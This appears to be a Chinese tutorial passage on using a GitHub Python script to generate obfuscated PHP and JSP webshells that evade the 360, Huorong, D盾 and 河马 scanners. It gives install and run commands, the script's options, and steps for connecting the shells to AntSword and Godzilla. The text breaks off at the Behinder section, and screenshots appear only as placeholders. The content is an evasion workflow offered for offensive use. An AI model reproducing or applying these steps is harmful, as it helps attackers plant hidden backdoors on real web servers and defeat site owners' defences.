【免杀专栏】Webshell 免杀过360、D盾、河马

一、准备工作

1、rouji脚本

百度网盘可下载

GitHub项目地址:https://github.com/ytMuCheng/ruoji

2、环境配置

python3 的环境模块

1
pip3 install -r re.txt

二、免杀操作

运行脚本:

1
python webshell_bypass_5.1.py -c 1

参数:

1
2
3
4
5
6
optional arguments:
-h, --help show this help message and exit
-p PHP, --php PHP -p 文件名 or --php 文件名
-j JSP, --jsp JSP -j 文件名 or --jsp 文件名
-c CONFIG, --config CONFIG
伪装模板(1-7) -c 1 or --config 1

1、方式一:免杀蚁剑

1、蚁剑免杀

1
python webshell_bypass_5.1.py -p shell.php	#shell.php是要生成的webshell名称

image-20240217151624329

2、上线蚁剑:

image-20240217152934707

image-20240217153021578

3、360、火绒绕过:

image-20240217151813920

D盾绕过:

image-20240217152401086

image-20240217152334275

4、河马绕过:

image-20240217152606824

image-20240217152619283

2、方式二、免杀哥斯拉

1、哥斯拉免杀

1
python webshell_bypass_5.1.py -p shell-gsl.php

image-20240217153959144

image-20240217154034876

3、方式三、免杀冰蝎

这里需要冰蝎4.0.5

image